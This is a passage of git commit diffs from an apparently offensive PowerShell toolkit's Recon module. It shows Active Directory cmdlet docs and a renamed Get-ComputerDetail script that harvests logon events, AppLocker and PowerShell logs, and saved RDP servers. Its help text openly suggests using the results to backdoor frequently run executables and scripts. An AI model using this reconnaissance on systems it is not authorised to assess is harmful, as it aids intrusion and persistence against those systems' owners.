+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the owner to set for -Identity. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Owner + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Set-DomainUserPassword.md b/docs/Recon/Set-DomainUserPassword.md index 1712294..2dd111a 100755 --- a/docs/Recon/Set-DomainUserPassword.md +++ b/docs/Recon/Set-DomainUserPassword.md @@ -1,7 +1,7 @@ # Set-DomainUserPassword ## SYNOPSIS -Sets the password for a given user identity and returns the user object. +Sets the password for a given user identity. Author: Will Schroeder (@harmj0y) License: BSD 3-Clause -- cgit v1.2.3 From ad32d6c75b4e70a6b2e1b56a683a6ba71f1c0683 Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Wed, 14 Dec 2016 19:23:28 -0500 Subject: For ./Recon/ : -(More) PSScriptAnalyzering -Tweaking of synopsis blocks in order to support platyPS -Code standardization -Generated docs --- Recon/Get-ComputerDetail.ps1 | 574 ++++++++++++++++++++++++++++++++++ Recon/Get-ComputerDetails.ps1 | 574 ---------------------------------- Recon/Get-HttpStatus.ps1 | 62 ++-- Recon/Invoke-Portscan.ps1 | 34 +- Recon/Invoke-ReverseDnsLookup.ps1 | 84 ++--- Recon/PowerView.ps1 | 2 +- Recon/Recon.psd1 | 2 +- docs/Recon/Export-PowerViewCSV.md | 2 +- docs/Recon/Get-ComputerDetail.md | 68 ++++ docs/Recon/Get-ComputerDetails.md | 68 ---- docs/Recon/Get-HttpStatus.md | 8 +- docs/Recon/Invoke-Portscan.md | 8 +- docs/Recon/Invoke-ReverseDnsLookup.md | 14 +- docs/Recon/Set-DomainObject.md | 26 +- docs/Recon/index.md | 0 mkdocs.yml | 2 +- 16 files changed, 758 insertions(+), 770 deletions(-) create mode 100644 Recon/Get-ComputerDetail.ps1 delete mode 100644 Recon/Get-ComputerDetails.ps1 create mode 100755 docs/Recon/Get-ComputerDetail.md delete mode 100755 docs/Recon/Get-ComputerDetails.md mode change 100644 => 100755 docs/Recon/index.md (limited to 'docs/Recon') diff --git a/Recon/Get-ComputerDetail.ps1 b/Recon/Get-ComputerDetail.ps1 new file mode 100644 index 0000000..ef3720c --- /dev/null +++ b/Recon/Get-ComputerDetail.ps1 @@ -0,0 +1,574 @@ +function Get-ComputerDetail +{ +<# +.SYNOPSIS + +This script is used to get useful information from a computer. + +Function: Get-ComputerDetail +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +This script is used to get useful information from a computer. Currently, the script gets the following information: +-Explicit Credential Logons (Event ID 4648) +-Logon events (Event ID 4624) +-AppLocker logs to find what processes are created +-PowerShell logs to find PowerShell scripts which have been executed +-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to + +.PARAMETER ToString + +Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. + +.EXAMPLE + +Get-ComputerDetail +Gets information about the computer and outputs it as PowerShell objects. + +Get-ComputerDetail -ToString +Gets information about the computer and outputs it as raw text. + +.NOTES +This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. +You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. + +.LINK + +Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell + +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + Param( + [Parameter(Position=0)] + [Switch] + $ToString + ) + + Set-StrictMode -Version 2 + + $SecurityLog = Get-EventLog -LogName Security + $Filtered4624 = Find-4624Logon $SecurityLog + $Filtered4648 = Find-4648Logon $SecurityLog + $AppLockerLogs = Find-AppLockerLog + $PSLogs = Find-PSScriptsInPSAppLog + $RdpClientData = Find-RDPClientConnection + + if ($ToString) + { + Write-Output "Event ID 4624 (Logon):" + Write-Output $Filtered4624.Values | Format-List + Write-Output "Event ID 4648 (Explicit Credential Logon):" + Write-Output $Filtered4648.Values | Format-List + Write-Output "AppLocker Process Starts:" + Write-Output $AppLockerLogs.Values | Format-List + Write-Output "PowerShell Script Executions:" + Write-Output $PSLogs.Values | Format-List + Write-Output "RDP Client Data:" + Write-Output $RdpClientData.Values | Format-List + } + else + { + $Properties = @{ + LogonEvent4624 = $Filtered4624.Values + LogonEvent4648 = $Filtered4648.Values + AppLockerProcessStart = $AppLockerLogs.Values + PowerShellScriptStart = $PSLogs.Values + RdpClientData = $RdpClientData.Values + } + + $ReturnObj = New-Object PSObject -Property $Properties + return $ReturnObj + } +} + + +function Find-4648Logon +{ +<# +.SYNOPSIS + +Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the +the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful +for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. + +Function: Find-4648Logon +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the +the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful +for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. + +.EXAMPLE + +Find-4648Logon +Gets the unique 4648 logon events. + +.NOTES + +.LINK + +Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell +#> + + Param( + $SecurityLog + ) + + $ExplicitLogons = $SecurityLog | Where-Object {$_.InstanceID -eq 4648} + $ReturnInfo = @{} + + foreach ($ExplicitLogon in $ExplicitLogons) + { + $Subject = $false + $AccountWhosCredsUsed = $false + $TargetServer = $false + $SourceAccountName = "" + $SourceAccountDomain = "" + $TargetAccountName = "" + $TargetAccountDomain = "" + $TargetServer = "" + foreach ($line in $ExplicitLogon.Message -split "\r\n") + { + if ($line -cmatch "^Subject:$") + { + $Subject = $true + } + elseif ($line -cmatch "^Account\sWhose\sCredentials\sWere\sUsed:$") + { + $Subject = $false + $AccountWhosCredsUsed = $true + } + elseif ($line -cmatch "^Target\sServer:") + { + $AccountWhosCredsUsed = $false + $TargetServer = $true + } + elseif ($Subject -eq $true) + { + if ($line -cmatch "\s+Account\sName:\s+(\S.*)") + { + $SourceAccountName = $Matches[1] + } + elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)") + { + $SourceAccountDomain = $Matches[1] + } + } + elseif ($AccountWhosCredsUsed -eq $true) + { + if ($line -cmatch "\s+Account\sName:\s+(\S.*)") + { + $TargetAccountName = $Matches[1] + } + elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)") + { + $TargetAccountDomain = $Matches[1] + } + } + elseif ($TargetServer -eq $true) + { + if ($line -cmatch "\s+Target\sServer\sName:\s+(\S.*)") + { + $TargetServer = $Matches[1] + } + } + } + + #Filter out logins that don't matter + if (-not ($TargetAccountName -cmatch "^DWM-.*" -and $TargetAccountDomain -cmatch "^Window\sManager$")) + { + $Key = $SourceAccountName + $SourceAccountDomain + $TargetAccountName + $TargetAccountDomain + $TargetServer + if (-not $ReturnInfo.ContainsKey($Key)) + { + $Properties = @{ + LogType = 4648 + LogSource = "Security" + SourceAccountName = $SourceAccountName + SourceDomainName = $SourceAccountDomain + TargetAccountName = $TargetAccountName + TargetDomainName = $TargetAccountDomain + TargetServer = $TargetServer + Count = 1 + Times = @($ExplicitLogon.TimeGenerated) + } + + $ResultObj = New-Object PSObject -Property $Properties + $ReturnInfo.Add($Key, $ResultObj) + } + else + { + $ReturnInfo[$Key].Count++ + $ReturnInfo[$Key].Times += ,$ExplicitLogon.TimeGenerated + } + } + } + + return $ReturnInfo +} + +function Find-4624Logon +{ +<# +.SYNOPSIS + +Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do +network logons in to the server, what accounts RDP in, what accounts log in locally, etc... + +Function: Find-4624Logon +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do +network logons in to the server, what accounts RDP in, what accounts log in locally, etc... + +.EXAMPLE + +Find-4624Logon +Find unique 4624 logon events. + +.NOTES + +.LINK + +Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell +#> + Param ( + $SecurityLog + ) + + $Logons = $SecurityLog | Where-Object {$_.InstanceID -eq 4624} + $ReturnInfo = @{} + + foreach ($Logon in $Logons) + { + $SubjectSection = $false + $NewLogonSection = $false + $NetworkInformationSection = $false + $AccountName = "" + $AccountDomain = "" + $LogonType = "" + $NewLogonAccountName = "" + $NewLogonAccountDomain = "" + $WorkstationName = "" + $SourceNetworkAddress = "" + $SourcePort = "" + + foreach ($line in $Logon.Message -Split "\r\n") + { + if ($line -cmatch "^Subject:$") + { + $SubjectSection = $true + } + elseif ($line -cmatch "^Logon\sType:\s+(\S.*)") + { + $LogonType = $Matches[1] + } + elseif ($line -cmatch "^New\sLogon:$") + { + $SubjectSection = $false + $NewLogonSection = $true + } + elseif ($line -cmatch "^Network\sInformation:$") + { + $NewLogonSection = $false + $NetworkInformationSection = $true + } + elseif ($SubjectSection) + { + if ($line -cmatch "^\s+Account\sName:\s+(\S.*)") + { + $AccountName = $Matches[1] + } + elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)") + { + $AccountDomain = $Matches[1] + } + } + elseif ($NewLogonSection) + { + if ($line -cmatch "^\s+Account\sName:\s+(\S.*)") + { + $NewLogonAccountName = $Matches[1] + } + elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)") + { + $NewLogonAccountDomain = $Matches[1] + } + } + elseif ($NetworkInformationSection) + { + if ($line -cmatch "^\s+Workstation\sName:\s+(\S.*)") + { + $WorkstationName = $Matches[1] + } + elseif ($line -cmatch "^\s+Source\sNetwork\sAddress:\s+(\S.*)") + { + $SourceNetworkAddress = $Matches[1] + } + elseif ($line -cmatch "^\s+Source\sPort:\s+(\S.*)") + { + $SourcePort = $Matches[1] + } + } + } + + #Filter out logins that don't matter + if (-not ($NewLogonAccountDomain -cmatch "NT\sAUTHORITY" -or $NewLogonAccountDomain -cmatch "Window\sManager")) + { + $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort + if (-not $ReturnInfo.ContainsKey($Key)) + { + $Properties = @{ + LogType = 4624 + LogSource = "Security" + SourceAccountName = $AccountName + SourceDomainName = $AccountDomain + NewLogonAccountName = $NewLogonAccountName + NewLogonAccountDomain = $NewLogonAccountDomain + LogonType = $LogonType + WorkstationName = $WorkstationName + SourceNetworkAddress = $SourceNetworkAddress + SourcePort = $SourcePort + Count = 1 + Times = @($Logon.TimeGenerated) + } + + $ResultObj = New-Object PSObject -Property $Properties + $ReturnInfo.Add($Key, $ResultObj) + } + else + { + $ReturnInfo[$Key].Count++ + $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated + } + } + } + + return $ReturnInfo +} + + +function Find-AppLockerLog +{ +<# +.SYNOPSIS + +Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run). + +Function: Find-AppLockerLog +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run). + +.EXAMPLE + +Find-AppLockerLog +Find process creations from AppLocker logs. + +.NOTES + +.LINK + +Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell +#> + + $ReturnInfo = @{} + + $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 8002} + + foreach ($Log in $AppLockerLogs) + { + $SID = New-Object System.Security.Principal.SecurityIdentifier($Log.Properties[7].Value) + $UserName = $SID.Translate( [System.Security.Principal.NTAccount]) + + $ExeName = $Log.Properties[10].Value + + $Key = $UserName.ToString() + "::::" + $ExeName + + if (!$ReturnInfo.ContainsKey($Key)) + { + $Properties = @{ + Exe = $ExeName + User = $UserName.Value + Count = 1 + Times = @($Log.TimeCreated) + } + + $Item = New-Object PSObject -Property $Properties + $ReturnInfo.Add($Key, $Item) + } + else + { + $ReturnInfo[$Key].Count++ + $ReturnInfo[$Key].Times += ,$Log.TimeCreated + } + } + + return $ReturnInfo +} + + +Function Find-PSScriptsInPSAppLog +{ +<# +.SYNOPSIS + +Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log). +You can then backdoor these scripts or do other malicious things. + +Function: Find-AppLockerLog +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log). +You can then backdoor these scripts or do other malicious things. + +.EXAMPLE + +Find-PSScriptsInPSAppLog +Find unique PowerShell scripts being executed from the PowerShell operational log. + +.NOTES + +.LINK + +Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell +#> + + $ReturnInfo = @{} + $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 4100} + + foreach ($Log in $Logs) + { + $LogDetails = $Log.Message -split "`r`n" + + $FoundScriptName = $false + foreach($Line in $LogDetails) + { + if ($Line -imatch "^\s*Script\sName\s=\s(.+)") + { + $ScriptName = $Matches[1] + $FoundScriptName = $true + } + elseif ($Line -imatch "^\s*User\s=\s(.*)") + { + $User = $Matches[1] + } + } + + if ($FoundScriptName) + { + $Key = $ScriptName + "::::" + $User + + if (!$ReturnInfo.ContainsKey($Key)) + { + $Properties = @{ + ScriptName = $ScriptName + UserName = $User + Count = 1 + Times = @($Log.TimeCreated) + } + + $Item = New-Object PSObject -Property $Properties + $ReturnInfo.Add($Key, $Item) + } + else + { + $ReturnInfo[$Key].Count++ + $ReturnInfo[$Key].Times += ,$Log.TimeCreated + } + } + } + + return $ReturnInfo +} + + +Function Find-RDPClientConnection +{ +<# +.SYNOPSIS + +Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user +usually RDP's to. + +Function: Find-RDPClientConnection +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user usually RDP's to. + +.EXAMPLE + +Find-RDPClientConnection +Find unique saved RDP client connections. + +.NOTES + +.LINK + +Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell +#> + $ReturnInfo = @{} + + New-PSDrive -Name HKU -PSProvider Registry -Root Registry::HKEY_USERS | Out-Null + + #Attempt to enumerate the servers for all users + $Users = Get-ChildItem -Path "HKU:\" + foreach ($UserSid in $Users.PSChildName) + { + $Servers = Get-ChildItem "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue + + foreach ($Server in $Servers) + { + $Server = $Server.PSChildName + $UsernameHint = (Get-ItemProperty -Path "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers\$($Server)").UsernameHint + + $Key = $UserSid + "::::" + $Server + "::::" + $UsernameHint + + if (!$ReturnInfo.ContainsKey($Key)) + { + $SIDObj = New-Object System.Security.Principal.SecurityIdentifier($UserSid) + $User = ($SIDObj.Translate([System.Security.Principal.NTAccount])).Value + + $Properties = @{ + CurrentUser = $User + Server = $Server + UsernameHint = $UsernameHint + } + + $Item = New-Object PSObject -Property $Properties + $ReturnInfo.Add($Key, $Item) + } + } + } + + return $ReturnInfo +} diff --git a/Recon/Get-ComputerDetails.ps1 b/Recon/Get-ComputerDetails.ps1 deleted file mode 100644 index bd00deb..0000000 --- a/Recon/Get-ComputerDetails.ps1 +++ /dev/null @@ -1,574 +0,0 @@ -function Get-ComputerDetails -{ -<# -.SYNOPSIS - -This script is used to get useful information from a computer. - -Function: Get-ComputerDetails -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -This script is used to get useful information from a computer. Currently, the script gets the following information: --Explicit Credential Logons (Event ID 4648) --Logon events (Event ID 4624) --AppLocker logs to find what processes are created --PowerShell logs to find PowerShell scripts which have been executed --RDP Client Saved Servers, which indicates what servers the user typically RDP's in to - -.PARAMETER ToString - -Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. - -.EXAMPLE - -Get-ComputerDetails -Gets information about the computer and outputs it as PowerShell objects. - -Get-ComputerDetails -ToString -Gets information about the computer and outputs it as raw text. - -.NOTES -This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. -You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. - -.LINK - -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell - -#> - - Param( - [Parameter(Position=0)] - [Switch] - $ToString - ) - - Set-StrictMode -Version 2 - - - - $SecurityLog = Get-EventLog -LogName Security - $Filtered4624 = Find-4624Logons $SecurityLog - $Filtered4648 = Find-4648Logons $SecurityLog - $AppLockerLogs = Find-AppLockerLogs - $PSLogs = Find-PSScriptsInPSAppLog - $RdpClientData = Find-RDPClientConnections - - if ($ToString) - { - Write-Output "Event ID 4624 (Logon):" - Write-Output $Filtered4624.Values | Format-List - Write-Output "Event ID 4648 (Explicit Credential Logon):" - Write-Output $Filtered4648.Values | Format-List - Write-Output "AppLocker Process Starts:" - Write-Output $AppLockerLogs.Values | Format-List - Write-Output "PowerShell Script Executions:" - Write-Output $PSLogs.Values | Format-List - Write-Output "RDP Client Data:" - Write-Output $RdpClientData.Values | Format-List - } - else - { - $Properties = @{ - LogonEvent4624 = $Filtered4624.Values - LogonEvent4648 = $Filtered4648.Values - AppLockerProcessStart = $AppLockerLogs.Values - PowerShellScriptStart = $PSLogs.Values - RdpClientData = $RdpClientData.Values - } - - $ReturnObj = New-Object PSObject -Property $Properties - return $ReturnObj - } -} - - -function Find-4648Logons -{ -<# -.SYNOPSIS - -Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the -the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful -for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. - -Function: Find-4648Logons -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the -the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful -for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. - -.EXAMPLE - -Find-4648Logons -Gets the unique 4648 logon events. - -.NOTES - -.LINK - -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell -#> - Param( - $SecurityLog - ) - - $ExplicitLogons = $SecurityLog | Where {$_.InstanceID -eq 4648} - $ReturnInfo = @{} - - foreach ($ExplicitLogon in $ExplicitLogons) - { - $Subject = $false - $AccountWhosCredsUsed = $false - $TargetServer = $false - $SourceAccountName = "" - $SourceAccountDomain = "" - $TargetAccountName = "" - $TargetAccountDomain = "" - $TargetServer = "" - foreach ($line in $ExplicitLogon.Message -split "\r\n") - { - if ($line -cmatch "^Subject:$") - { - $Subject = $true - } - elseif ($line -cmatch "^Account\sWhose\sCredentials\sWere\sUsed:$") - { - $Subject = $false - $AccountWhosCredsUsed = $true - } - elseif ($line -cmatch "^Target\sServer:") - { - $AccountWhosCredsUsed = $false - $TargetServer = $true - } - elseif ($Subject -eq $true) - { - if ($line -cmatch "\s+Account\sName:\s+(\S.*)") - { - $SourceAccountName = $Matches[1] - } - elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)") - { - $SourceAccountDomain = $Matches[1] - } - } - elseif ($AccountWhosCredsUsed -eq $true) - { - if ($line -cmatch "\s+Account\sName:\s+(\S.*)") - { - $TargetAccountName = $Matches[1] - } - elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)") - { - $TargetAccountDomain = $Matches[1] - } - } - elseif ($TargetServer -eq $true) - { - if ($line -cmatch "\s+Target\sServer\sName:\s+(\S.*)") - { - $TargetServer = $Matches[1] - } - } - } - - #Filter out logins that don't matter - if (-not ($TargetAccountName -cmatch "^DWM-.*" -and $TargetAccountDomain -cmatch "^Window\sManager$")) - { - $Key = $SourceAccountName + $SourceAccountDomain + $TargetAccountName + $TargetAccountDomain + $TargetServer - if (-not $ReturnInfo.ContainsKey($Key)) - { - $Properties = @{ - LogType = 4648 - LogSource = "Security" - SourceAccountName = $SourceAccountName - SourceDomainName = $SourceAccountDomain - TargetAccountName = $TargetAccountName - TargetDomainName = $TargetAccountDomain - TargetServer = $TargetServer - Count = 1 - Times = @($ExplicitLogon.TimeGenerated) - } - - $ResultObj = New-Object PSObject -Property $Properties - $ReturnInfo.Add($Key, $ResultObj) - } - else - { - $ReturnInfo[$Key].Count++ - $ReturnInfo[$Key].Times += ,$ExplicitLogon.TimeGenerated - } - } - } - - return $ReturnInfo -} - -function Find-4624Logons -{ -<# -.SYNOPSIS - -Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do -network logons in to the server, what accounts RDP in, what accounts log in locally, etc... - -Function: Find-4624Logons -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do -network logons in to the server, what accounts RDP in, what accounts log in locally, etc... - -.EXAMPLE - -Find-4624Logons -Find unique 4624 logon events. - -.NOTES - -.LINK - -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell -#> - Param ( - $SecurityLog - ) - - $Logons = $SecurityLog | Where {$_.InstanceID -eq 4624} - $ReturnInfo = @{} - - foreach ($Logon in $Logons) - { - $SubjectSection = $false - $NewLogonSection = $false - $NetworkInformationSection = $false - $AccountName = "" - $AccountDomain = "" - $LogonType = "" - $NewLogonAccountName = "" - $NewLogonAccountDomain = "" - $WorkstationName = "" - $SourceNetworkAddress = "" - $SourcePort = "" - - foreach ($line in $Logon.Message -Split "\r\n") - { - if ($line -cmatch "^Subject:$") - { - $SubjectSection = $true - } - elseif ($line -cmatch "^Logon\sType:\s+(\S.*)") - { - $LogonType = $Matches[1] - } - elseif ($line -cmatch "^New\sLogon:$") - { - $SubjectSection = $false - $NewLogonSection = $true - } - elseif ($line -cmatch "^Network\sInformation:$") - { - $NewLogonSection = $false - $NetworkInformationSection = $true - } - elseif ($SubjectSection) - { - if ($line -cmatch "^\s+Account\sName:\s+(\S.*)") - { - $AccountName = $Matches[1] - } - elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)") - { - $AccountDomain = $Matches[1] - } - } - elseif ($NewLogonSection) - { - if ($line -cmatch "^\s+Account\sName:\s+(\S.*)") - { - $NewLogonAccountName = $Matches[1] - } - elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)") - { - $NewLogonAccountDomain = $Matches[1] - } - } - elseif ($NetworkInformationSection) - { - if ($line -cmatch "^\s+Workstation\sName:\s+(\S.*)") - { - $WorkstationName = $Matches[1] - } - elseif ($line -cmatch "^\s+Source\sNetwork\sAddress:\s+(\S.*)") - { - $SourceNetworkAddress = $Matches[1] - } - elseif ($line -cmatch "^\s+Source\sPort:\s+(\S.*)") - { - $SourcePort = $Matches[1] - } - } - } - - #Filter out logins that don't matter - if (-not ($NewLogonAccountDomain -cmatch "NT\sAUTHORITY" -or $NewLogonAccountDomain -cmatch "Window\sManager")) - { - $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort - if (-not $ReturnInfo.ContainsKey($Key)) - { - $Properties = @{ - LogType = 4624 - LogSource = "Security" - SourceAccountName = $AccountName - SourceDomainName = $AccountDomain - NewLogonAccountName = $NewLogonAccountName - NewLogonAccountDomain = $NewLogonAccountDomain - LogonType = $LogonType - WorkstationName = $WorkstationName - SourceNetworkAddress = $SourceNetworkAddress - SourcePort = $SourcePort - Count = 1 - Times = @($Logon.TimeGenerated) - } - - $ResultObj = New-Object PSObject -Property $Properties - $ReturnInfo.Add($Key, $ResultObj) - } - else - { - $ReturnInfo[$Key].Count++ - $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated - } - } - } - - return $ReturnInfo -} - - -function Find-AppLockerLogs -{ -<# -.SYNOPSIS - -Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run). - -Function: Find-AppLockerLogs -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run). - -.EXAMPLE - -Find-AppLockerLogs -Find process creations from AppLocker logs. - -.NOTES - -.LINK - -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell -#> - $ReturnInfo = @{} - - $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where {$_.Id -eq 8002} - - foreach ($Log in $AppLockerLogs) - { - $SID = New-Object System.Security.Principal.SecurityIdentifier($Log.Properties[7].Value) - $UserName = $SID.Translate( [System.Security.Principal.NTAccount]) - - $ExeName = $Log.Properties[10].Value - - $Key = $UserName.ToString() + "::::" + $ExeName - - if (!$ReturnInfo.ContainsKey($Key)) - { - $Properties = @{ - Exe = $ExeName - User = $UserName.Value - Count = 1 - Times = @($Log.TimeCreated) - } - - $Item = New-Object PSObject -Property $Properties - $ReturnInfo.Add($Key, $Item) - } - else - { - $ReturnInfo[$Key].Count++ - $ReturnInfo[$Key].Times += ,$Log.TimeCreated - } - } - - return $ReturnInfo -} - - -Function Find-PSScriptsInPSAppLog -{ -<# -.SYNOPSIS - -Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log). -You can then backdoor these scripts or do other malicious things. - -Function: Find-AppLockerLogs -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log). -You can then backdoor these scripts or do other malicious things. - -.EXAMPLE - -Find-PSScriptsInPSAppLog -Find unique PowerShell scripts being executed from the PowerShell operational log. - -.NOTES - -.LINK - -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell -#> - $ReturnInfo = @{} - $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where {$_.Id -eq 4100} - - foreach ($Log in $Logs) - { - $ContainsScriptName = $false - $LogDetails = $Log.Message -split "`r`n" - - $FoundScriptName = $false - foreach($Line in $LogDetails) - { - if ($Line -imatch "^\s*Script\sName\s=\s(.+)") - { - $ScriptName = $Matches[1] - $FoundScriptName = $true - } - elseif ($Line -imatch "^\s*User\s=\s(.*)") - { - $User = $Matches[1] - } - } - - if ($FoundScriptName) - { - $Key = $ScriptName + "::::" + $User - - if (!$ReturnInfo.ContainsKey($Key)) - { - $Properties = @{ - ScriptName = $ScriptName - UserName = $User - Count = 1 - Times = @($Log.TimeCreated) - } - - $Item = New-Object 